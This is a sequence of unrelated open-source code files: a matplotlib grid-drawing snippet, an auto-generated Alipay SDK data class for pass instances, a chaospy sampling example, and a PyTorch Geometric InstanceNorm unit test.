fig = plt.figure(figsize=(8, 6), dpi=72, facecolor="white")
axes = plt.subplot(111)
axes.set_xlim(0, 4)
axes.set_ylim(0, 3)
axes.xaxis.set_major_locator(MultipleLocator(1.0))
axes.xaxis.set_minor_locator(MultipleLocator(0.1))
axes.yaxis.set_major_locator(MultipleLocator(1.0))
axes.yaxis.set_minor_locator(MultipleLocator(0.1))
axes.grid(which='major', axis='x', linewidth=0.75, linestyle='-', color='0.75')
axes.grid(which='minor', axis='x', linewidth=0.25, linestyle='-', color='0.75')
axes.grid(which='major', axis='y', linewidth=0.75, linestyle='-', color='0.75')
axes.grid(which='minor', axis='y', linewidth=0.25, linestyle='-', color='0.75')
axes.set_xticklabels([])
axes.set_yticklabels([])
# Add a title and a box around it
from matplotlib.patches import FancyBboxPatch
ax = plt.gca()
ax.add_patch(FancyBboxPatch((-0.05, .87),
width=.66, height=.165, clip_on=False,
boxstyle="square,pad=0", zorder=3,
facecolor='white', alpha=1.0,
transform=plt.gca().transAxes))
plt.text(-0.05, 1.02, " Grid: plt.grid(...)\n",
horizontalalignment='left',
verticalalignment='top',
size='xx-large',
transform=axes.transAxes)
plt.text(-0.05, 1.01, "\n\n Draw ticks and grid ",
horizontalalignment='left',
verticalalignment='top',
size='large',
transform=axes.transAxes)
|
alipay/aop/api/domain/PassInstanceDetail.py | snowxmas/alipay-sdk-python-all | 213 | 11090917 | <filename>alipay/aop/api/domain/PassInstanceDetail.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.BizParamKeyValue import BizParamKeyValue
class PassInstanceDetail(object):
def __init__(self):
self._biz_param_list = None
self._channel_id = None
self._create_time = None
self._end_date = None
self._is_deleted = None
self._logo = None
self._logo_text = None
self._modify_time = None
self._pass_id = None
self._product = None
self._serial_number = None
self._start_date = None
self._status = None
self._strip = None
self._tpl_id = None
self._type = None
self._user_id = None
@property
def biz_param_list(self):
return self._biz_param_list
@biz_param_list.setter
def biz_param_list(self, value):
if isinstance(value, list):
self._biz_param_list = list()
for i in value:
if isinstance(i, BizParamKeyValue):
self._biz_param_list.append(i)
else:
self._biz_param_list.append(BizParamKeyValue.from_alipay_dict(i))
@property
def channel_id(self):
return self._channel_id
@channel_id.setter
def channel_id(self, value):
self._channel_id = value
@property
def create_time(self):
return self._create_time
@create_time.setter
def create_time(self, value):
self._create_time = value
@property
def end_date(self):
return self._end_date
@end_date.setter
def end_date(self, value):
self._end_date = value
@property
def is_deleted(self):
return self._is_deleted
@is_deleted.setter
def is_deleted(self, value):
self._is_deleted = value
@property
def logo(self):
return self._logo
@logo.setter
def logo(self, value):
self._logo = value
@property
def logo_text(self):
return self._logo_text
@logo_text.setter
def logo_text(self, value):
self._logo_text = value
@property
def modify_time(self):
return self._modify_time
@modify_time.setter
def modify_time(self, value):
self._modify_time = value
@property
def pass_id(self):
return self._pass_id
@pass_id.setter
def pass_id(self, value):
self._pass_id = value
@property
def product(self):
return self._product
@product.setter
def product(self, value):
self._product = value
@property
def serial_number(self):
return self._serial_number
@serial_number.setter
def serial_number(self, value):
self._serial_number = value
@property
def start_date(self):
return self._start_date
@start_date.setter
def start_date(self, value):
self._start_date = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def strip(self):
return self._strip
@strip.setter
def strip(self, value):
self._strip = value
@property
def tpl_id(self):
return self._tpl_id
@tpl_id.setter
def tpl_id(self, value):
self._tpl_id = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.biz_param_list:
if isinstance(self.biz_param_list, list):
for i in range(0, len(self.biz_param_list)):
element = self.biz_param_list[i]
if hasattr(element, 'to_alipay_dict'):
self.biz_param_list[i] = element.to_alipay_dict()
if hasattr(self.biz_param_list, 'to_alipay_dict'):
params['biz_param_list'] = self.biz_param_list.to_alipay_dict()
else:
params['biz_param_list'] = self.biz_param_list
if self.channel_id:
if hasattr(self.channel_id, 'to_alipay_dict'):
params['channel_id'] = self.channel_id.to_alipay_dict()
else:
params['channel_id'] = self.channel_id
if self.create_time:
if hasattr(self.create_time, 'to_alipay_dict'):
params['create_time'] = self.create_time.to_alipay_dict()
else:
params['create_time'] = self.create_time
if self.end_date:
if hasattr(self.end_date, 'to_alipay_dict'):
params['end_date'] = self.end_date.to_alipay_dict()
else:
params['end_date'] = self.end_date
if self.is_deleted:
if hasattr(self.is_deleted, 'to_alipay_dict'):
params['is_deleted'] = self.is_deleted.to_alipay_dict()
else:
params['is_deleted'] = self.is_deleted
if self.logo:
if hasattr(self.logo, 'to_alipay_dict'):
params['logo'] = self.logo.to_alipay_dict()
else:
params['logo'] = self.logo
if self.logo_text:
if hasattr(self.logo_text, 'to_alipay_dict'):
params['logo_text'] = self.logo_text.to_alipay_dict()
else:
params['logo_text'] = self.logo_text
if self.modify_time:
if hasattr(self.modify_time, 'to_alipay_dict'):
params['modify_time'] = self.modify_time.to_alipay_dict()
else:
params['modify_time'] = self.modify_time
if self.pass_id:
if hasattr(self.pass_id, 'to_alipay_dict'):
params['pass_id'] = self.pass_id.to_alipay_dict()
else:
params['pass_id'] = self.pass_id
if self.product:
if hasattr(self.product, 'to_alipay_dict'):
params['product'] = self.product.to_alipay_dict()
else:
params['product'] = self.product
if self.serial_number:
if hasattr(self.serial_number, 'to_alipay_dict'):
params['serial_number'] = self.serial_number.to_alipay_dict()
else:
params['serial_number'] = self.serial_number
if self.start_date:
if hasattr(self.start_date, 'to_alipay_dict'):
params['start_date'] = self.start_date.to_alipay_dict()
else:
params['start_date'] = self.start_date
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
if self.strip:
if hasattr(self.strip, 'to_alipay_dict'):
params['strip'] = self.strip.to_alipay_dict()
else:
params['strip'] = self.strip
if self.tpl_id:
if hasattr(self.tpl_id, 'to_alipay_dict'):
params['tpl_id'] = self.tpl_id.to_alipay_dict()
else:
params['tpl_id'] = self.tpl_id
if self.type:
if hasattr(self.type, 'to_alipay_dict'):
params['type'] = self.type.to_alipay_dict()
else:
params['type'] = self.type
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = PassInstanceDetail()
if 'biz_param_list' in d:
o.biz_param_list = d['biz_param_list']
if 'channel_id' in d:
o.channel_id = d['channel_id']
if 'create_time' in d:
o.create_time = d['create_time']
if 'end_date' in d:
o.end_date = d['end_date']
if 'is_deleted' in d:
o.is_deleted = d['is_deleted']
if 'logo' in d:
o.logo = d['logo']
if 'logo_text' in d:
o.logo_text = d['logo_text']
if 'modify_time' in d:
o.modify_time = d['modify_time']
if 'pass_id' in d:
            o.pass_id = d['pass_id']
if 'product' in d:
o.product = d['product']
if 'serial_number' in d:
o.serial_number = d['serial_number']
if 'start_date' in d:
o.start_date = d['start_date']
if 'status' in d:
o.status = d['status']
if 'strip' in d:
o.strip = d['strip']
if 'tpl_id' in d:
o.tpl_id = d['tpl_id']
if 'type' in d:
o.type = d['type']
if 'user_id' in d:
o.user_id = d['user_id']
return o
|
docs/user_guide/main_usage/monte_carlo_integration.py | utsekaj42/chaospy | 333 | 11090924 | <gh_stars>100-1000
from problem_formulation import joint
sobol_samples = joint.sample(10000, rule="sobol")
antithetic_samples = joint.sample(10000, antithetic=True, seed=1234)
halton_samples = joint.sample(10000, rule="halton")
|
test/nn/norm/test_instance_norm.py | mrmotallebi/pytorch_geometric | 12,651 | 11090928 | <reponame>mrmotallebi/pytorch_geometric
import pytest
import torch
from torch_geometric.nn import InstanceNorm
@pytest.mark.parametrize('conf', [True, False])
def test_instance_norm(conf):
batch = torch.zeros(100, dtype=torch.long)
x1 = torch.randn(100, 16)
x2 = torch.randn(100, 16)
norm1 = InstanceNorm(16, affine=conf, track_running_stats=conf)
norm2 = InstanceNorm(16, affine=conf, track_running_stats=conf)
assert norm1.__repr__() == 'InstanceNorm(16)'
torch.jit.script(norm1)
out1 = norm1(x1)
out2 = norm2(x1, batch)
assert out1.size() == (100, 16)
assert torch.allclose(out1, out2, atol=1e-7)
if conf:
assert torch.allclose(norm1.running_mean, norm2.running_mean)
assert torch.allclose(norm1.running_var, norm2.running_var)
out1 = norm1(x2)
out2 = norm2(x2, batch)
assert torch.allclose(out1, out2, atol=1e-7)
if conf:
assert torch.allclose(norm1.running_mean, norm2.running_mean)
assert torch.allclose(norm1.running_var, norm2.running_var)
norm1.eval()
norm2.eval()
out1 = norm1(x1)
out2 = norm2(x1, batch)
assert torch.allclose(out1, out2, atol=1e-7)
out1 = norm1(x2)
out2 = norm2(x2, batch)
assert torch.allclose(out1, out2, atol=1e-7)
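    # Normalizing two graphs batched together must match normalizing each graph
    # separately, since InstanceNorm operates per graph via the batch vector.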
out1 = norm2(x1)
out2 = norm2(x2)
out3 = norm2(torch.cat([x1, x2], dim=0), torch.cat([batch, batch + 1]))
assert torch.allclose(out1, out3[:100], atol=1e-7)
assert torch.allclose(out2, out3[100:], atol=1e-7)
|